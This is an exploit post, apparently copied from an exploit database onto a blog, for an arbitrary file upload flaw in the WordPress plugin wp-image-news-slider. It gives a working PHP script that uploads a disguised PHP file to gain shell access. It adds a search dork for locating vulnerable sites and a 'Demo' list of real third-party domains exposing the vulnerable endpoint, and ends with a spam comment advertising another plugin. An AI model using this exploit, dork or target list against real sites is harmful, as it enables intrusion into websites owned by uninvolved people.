# Exploit Title: Wordpress plugin wp-image-news-slider Arbitrary File Upload Vulnerability
# Date: 21/01/2013
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:wp-content/plugins/wp-image-news-slider
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
# Poc :
<?php
$uploadfile="cyber.php.gif";
$ch = curl_init("http://localhost/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/[path]/wp-content/uploads/random_name.php.gif
<?php
phpinfo();
?>
#------------------
#Demo :
http://www.bittemilano.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://wfcj.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://namastefarms.com/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
http://tclecateau.free.fr/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php
#------------------
#Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
# 1337day.com [2015-04-05] #
1 Komentar
Filament
BalasHapusIn a single WordPress plugin, Filament contains a group of useful features including Flare, a social share button plugin that makes it easy for others to share your blogpost on Twitter, Facebook, Buffer, and more—even spots like Hacker News and Reddit. Other Filament apps include: MailChimp subscribe form, Google Analytics tracking, all-in-one profiles, code management, and share highlighter.